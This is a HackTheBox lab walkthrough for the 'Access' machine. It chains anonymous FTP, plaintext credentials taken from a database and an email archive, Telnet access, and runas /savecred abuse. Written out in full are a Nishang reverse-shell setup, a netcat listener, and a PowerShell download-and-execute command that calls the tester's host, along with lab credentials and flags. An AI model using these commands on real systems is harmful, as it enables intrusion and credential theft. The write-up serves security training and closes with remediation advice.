HackTheBox - Access Machine
Complete Walkthrough: Physical Security & Saved Credentials
🎯 Machine Information
🖥️ Target Details
- Machine Name: Access
- IP Address: 10.10.10.98
- OS: Windows XP/7
- Difficulty: Easy
🎲 Machine Theme
- Focus: Physical Security Systems
- Key Skills: FTP Enumeration, Database Analysis
- Attack Vector: Saved Credentials
💡 Machine Learning Objectives
Access is an "easy" difficulty machine that highlights how machines associated with the physical security of an environment may not themselves be secure. It demonstrates how accessible FTP/file shares can often lead to getting a foothold or lateral movement, and teaches techniques for identifying and exploiting saved credentials.
🔍 Reconnaissance & Enumeration
Port Scanning with Nmap
Let's start with a comprehensive port scan to understand our attack surface:
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet Microsoft Windows XP telnetd
| telnet-ntlm-info:
| Target_Name: ACCESS
| NetBIOS_Domain_Name: ACCESS
| NetBIOS_Computer_Name: ACCESS
| DNS_Domain_Name: ACCESS
| DNS_Computer_Name: ACCESS
|_ Product_Version: 6.1.7600
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: MegaCorp
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
📊 Port Analysis
- Port 21 (FTP): Microsoft FTP service with anonymous login allowed - Primary attack vector
- Port 23 (Telnet): Windows XP Telnet service - Potential access point once we get credentials
- Port 80 (HTTP): Microsoft IIS 7.5 serving MegaCorp website
- Key Finding: Anonymous FTP access provides our initial entry point
📁 FTP Enumeration
Anonymous FTP Access
The Nmap scan revealed that anonymous FTP login is allowed. This is our primary attack vector:
ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
Directory Exploration
Let's explore the available directories and files:
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM Backups
08-24-18 10:00PM Engineer
226 Transfer complete.
🗂️ Directory Analysis
- Backups: Likely contains backup files - high potential for sensitive data
- Engineer: Engineering files - possibly containing technical documentation or credentials
Backups Directory Investigation
Let's examine the Backups directory first:
ftp> cd Backups
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 12.45 secs (443.2 kB/s)
Engineer Directory Investigation
Now let's check the Engineer directory:
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |**************************************************| 10870 25.15 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 0.42 secs (25.15 kB/s)
✅ Files Retrieved!
- backup.mdb: 5.6MB Microsoft Access database file
- Access Control.zip: 10.8KB password-protected archive
🗄️ Database Analysis
MDB File Investigation
The backup.mdb file is a Microsoft Access database. Let's analyze it using mdb-tools:
# Install mdb-tools if not already available
sudo apt install mdb-tools
# List all tables in the database
mdb-tables backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics
🔍 Key Table Identification
Among all these tables, the auth_user table stands out as it likely contains user authentication information - exactly what we need for credential discovery!
User Credentials Extraction
Let's extract data from the auth_user table to find credentials:
mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","***",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","**",1,"08/23/18 21:14:02",26,
🎯 Credentials Discovered!
- admin: ***
- engineer: access4u@security
- backup_admin: ****
These credentials will be useful for accessing the password-protected ZIP file!
📦 Archive Analysis
ZIP File Password Cracking
Now that we have potential passwords, let's try to extract the Access Control.zip file:
# Try different passwords from the database
unzip "Access Control.zip"
Archive: Access Control.zip
[Access Control.zip] Access Control.pst password: access4u@security
# Success! The engineer's password works
extracting: Access Control.pst
✅ Archive Extracted!
Successfully extracted Access Control.pst using password: access4u@security
PST File Analysis
The extracted file is a Microsoft Outlook PST (Personal Storage Table) file. Let's convert it to a readable mbox format with readpst:
# Install readpst if not available
sudo apt install pst-utils
# Convert PST to mbox format
readpst "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
# List generated files
ls -la
-rw-r--r-- 1 kali kali 156 Jul 31 12:30 Access Control.mbox
📧 Email Analysis
Reading Email Contents
Let's examine the contents of the converted mailbox file:
cat "Access Control.mbox"
📩 Email Message
From: [email protected]
To: [email protected]
Subject: Credentials Update
----
The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
----
🔑 Critical Information Found!
- Username: security
- Password: 4Cc3ssC0ntr0ller
- Context: These appear to be the credentials for the security account on the Access system
🔌 Telnet Access
Connecting via Telnet
Now we can use the discovered credentials to access the Telnet service we identified in our port scan:
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password: 4Cc3ssC0ntr0ller
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
🎉 Initial Access Achieved!
Successfully logged in as security user via Telnet!
🚩 User Flag
Flag Discovery
Let's navigate to the security user's desktop and retrieve the user flag:
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM .
08/28/2018 07:51 AM ..
07/29/2025 11:59 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,347,468,288 bytes free
C:\Users\security\Desktop>type user.txt
85d48b885cf14ed396b85608b3278068
✅ User Flag Captured!
User Flag: 85d48b885cf14ed396b85608b3278068
⚡ Privilege Escalation
System Enumeration
Now we need to escalate privileges to Administrator. Let's explore the system for privilege escalation opportunities:
C:\Users\security>whoami
access\security
C:\Users\security>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
Public Desktop Analysis
Let's check the Public user's desktop for interesting files:
C:\Users\security>cd C:\Users\Public\Desktop
C:\Users\Public\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Public\Desktop
08/22/2018 10:18 PM 1,870 ZKAccess3.5 Security System.lnk
1 File(s) 1,870 bytes
0 Dir(s) 3,347,468,288 bytes free
Shortcut File Analysis
The .lnk file is a Windows shortcut. Let's examine its contents to understand what it executes:
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
📄 Raw Shortcut Content
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows���:�▒M�:wWindowsV1MV�System32���:�▒MV��System32▒X2P�:� runas.exe���:1��:1�Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%� �wN�▒�]N�D.��Q���`�Xaccess�_���8{E�3 O�j)�H��� )ΰ[�_���8{E�3 O�j)�H��� )ΰ[� ��1SPS��XF�L8C���&�m�eS-1-5-21-953262931-566350628-63446256-500
🚨 Critical Discovery - Saved Credentials!
From the shortcut analysis, we can extract a crucial piece of information:
runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
Key Finding: The /savecred parameter means Administrator credentials are saved and can be reused!
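The readable strings in the dump above are the StringData section of the Shell Link format, which is why the runas arguments appear in the clear. As an added example (not code from the original write-up), here is a small parser that walks the .lnk layout documented in MS-SHLLINK (fixed header, optional LinkTargetIDList and LinkInfo, then the StringData fields) and flags shortcuts that launch runas.exe with /savecred; the sample .lnk is constructed in memory with the same strings as the ZKAccess shortcut, so it runs offline.

```python
"""Audit a .lnk (Shell Link) for a runas /savecred launcher. Added example, not
code from the original write-up; layout follows MS-SHLLINK (header, optional
LinkTargetIDList/LinkInfo, then StringData). The sample .lnk is constructed."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon")]

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (relative path, working dir, args, ...)."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C                            # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                # skip LinkTargetIDList: u16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:              # skip LinkInfo: u32 size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for bit, key in STRING_FIELDS:        # fixed order; each is u16 count + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[key] = data[pos:pos + count * width].decode(enc)
            pos += count * width
    return fields

def uses_saved_credentials(fields: dict) -> bool:
    """Audit check: the shortcut runs runas.exe with the /savecred switch."""
    cmd = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    return "runas" in cmd and "/savecred" in cmd

def build_lnk(relpath: str, workdir: str, args: str, unicode: bool = True) -> bytes:
    """Constructed minimal .lnk (header + StringData only), used for testing."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID.bytes_le, flags) + bytes(0x4C - 24)
    enc = "utf-16-le" if unicode else "cp1252"
    return header + b"".join(struct.pack("<H", len(s)) + s.encode(enc)
                             for s in (relpath, workdir, args))

# Constructed sample carrying the same strings as "ZKAccess3.5 Security System.lnk"
SAMPLE = build_lnk(r"..\..\..\Windows\System32\runas.exe", r"C:\ZKTeco\ZKAccess3.5",
                   r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"')
```

Run over the .lnk files under shared locations such as C:\Users\Public\Desktop, `uses_saved_credentials(parse_lnk(open(path, "rb").read()))` gives a defender a quick inventory of launchers that depend on cached credentials.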
Exploitation Setup
We can exploit the saved credentials to execute commands as Administrator. Let's prepare a reverse shell payload using Nishang:
# Download Nishang framework
git clone https://github.com/samratashok/nishang.git
# Create web directory
mkdir ~/www
# Copy PowerShell reverse shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 ~/www/
# Edit the script to add our reverse shell command at the end
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 443' >> ~/www/Invoke-PowerShellTcp.ps1
Web Server Setup
Start a web server to host our PowerShell payload:
# Start Python web server
cd ~/www
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
🔒 Network Access Note
Since we're connected to HTB VPN, any machine on the HTB network can reach our web server at our VPN IP address (10.10.14.10).
Reverse Shell Listener
Set up a netcat listener to catch our reverse shell:
# Start netcat listener
nc -lvnp 443
listening on [any] 443 ...
Privilege Escalation Execution
Now we exploit the saved credentials to execute our PowerShell payload as Administrator:
C:\Users\Public\Desktop>runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:80/Invoke-PowerShellTcp.ps1')"
Administrator Shell Obtained
Our netcat listener catches the reverse shell with Administrator privileges:
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.98] 49159
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
access\administrator
PS C:\Windows\system32> hostname
ACCESS
🎉 Privilege Escalation Successful!
We now have a PowerShell session running as Administrator!
🏆 Root Flag
Administrator Desktop Access
Let's navigate to the Administrator's desktop and retrieve the root flag:
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 8/21/2018 10:18 PM 32 root.txt
Final Flag Capture
PS C:\Users\Administrator\Desktop> type root.txt
9d59301ec8f4615078414751950b6820
🎉 MACHINE PWNED!
Root Flag: 9d59301ec8f4615078414751950b6820
We have successfully compromised the HTB Access machine and obtained both user and root flags!
🎓 Lessons Learned & Key Takeaways
Attack Chain Summary
- Port Scanning: Identified FTP (21), Telnet (23), and HTTP (80) services
- FTP Enumeration: Anonymous FTP access revealed backup files
- Database Analysis: Extracted credentials from Microsoft Access database
- Archive Extraction: Used found credentials to unlock password-protected ZIP
- Email Analysis: Discovered security account credentials in PST file
- Telnet Access: Gained initial foothold using discovered credentials
- Privilege Escalation: Exploited saved Administrator credentials via runas
Technical Skills Demonstrated
🔍 Enumeration
- Port scanning with Nmap
- FTP anonymous access
- File system exploration
🗄️ Database Analysis
- Microsoft Access MDB files
- MDB-tools usage
- Credential extraction
📧 Email Forensics
- PST file analysis
- Readpst tool usage
- Email content examination
🔓 Archive Analysis
- Password-protected archives
- Credential reuse attacks
- ZIP file extraction
🔌 Legacy Protocols
- Telnet authentication
- Windows command line
- System enumeration
⚡ Privilege Escalation
- Saved credentials exploitation
- PowerShell payloads
- Reverse shell techniques
Security Lessons
🔐 Anonymous Access
Anonymous FTP access can lead to significant data exposure. Backup files and sensitive documents should never be accessible without authentication.
🔑 Credential Storage
Storing plaintext credentials in databases is extremely dangerous. Passwords should always be properly hashed and salted.
📧 Email Security
Sensitive information like passwords should never be transmitted via email. Use secure communication channels and temporary passwords.
💾 Saved Credentials
The /savecred parameter in runas creates a significant security risk. Saved credentials can be reused by any user on the system to execute commands with elevated privileges.
🔌 Legacy Services
Telnet transmits credentials in plaintext and should be replaced with SSH. Legacy services often lack modern security features.
🛡️ Defense in Depth
Multiple security failures led to complete compromise. Each layer should be secured independently to prevent cascading failures.
Tools and Resources Used
🛠️ Essential Tools
- Nmap: Network reconnaissance and service discovery
- FTP Client: Anonymous file transfer and enumeration
- MDB-Tools: Microsoft Access database analysis
- Readpst: Microsoft Outlook PST file conversion
- Unzip: Archive extraction with password attempts
- Telnet: Remote access to legacy services
- Nishang: PowerShell reverse shell framework
- Python HTTP Server: Payload hosting
- Netcat: Reverse shell listener
Remediation Recommendations
🛡️ Security Improvements
- Disable Anonymous FTP: Require authentication for all FTP access
- Secure Backup Storage: Store backups in encrypted, access-controlled locations
- Hash Passwords: Never store plaintext credentials in databases
- Disable Telnet: Replace with SSH for secure remote access
- Remove Saved Credentials: Disable /savecred functionality in production
- Implement Email Security: Use encrypted channels for sensitive communications
- Regular Security Audits: Periodically review file permissions and access controls
- Network Segmentation: Isolate critical systems from general network access
Physical Security Context
🏢 Real-World Implications
This machine demonstrates a common scenario where physical security systems (access control, card readers, etc.) are managed by insecure IT infrastructure. Key lessons include:
- Integrated Security: Physical and IT security must be considered together
- Access Control Systems: Often run on standard IT infrastructure with poor security
- Backup Procedures: Physical security databases contain sensitive information requiring protection
- Vendor Security: Third-party security solutions may have their own vulnerabilities
Key Takeaways for Penetration Testers
💡 Professional Insights
- Always check for anonymous access on file sharing services
- Database files are often a goldmine of information - learn to analyze different formats
- Email archives (PST files) frequently contain credentials and sensitive information
- Look for saved credentials mechanisms in Windows environments
- Legacy services often have weaker security - don't overlook them
- Credential reuse is extremely common - always test found passwords across different services
🎯 Conclusion
The HTB Access machine provides an excellent introduction to common penetration testing techniques, focusing on the critical importance of proper credential management and access controls. This machine effectively demonstrates how seemingly separate security issues can be chained together to achieve complete system compromise.
The scenario is particularly relevant to real-world environments where physical security systems are often managed by poorly secured IT infrastructure, making it an invaluable learning experience for both beginners and professionals in cybersecurity.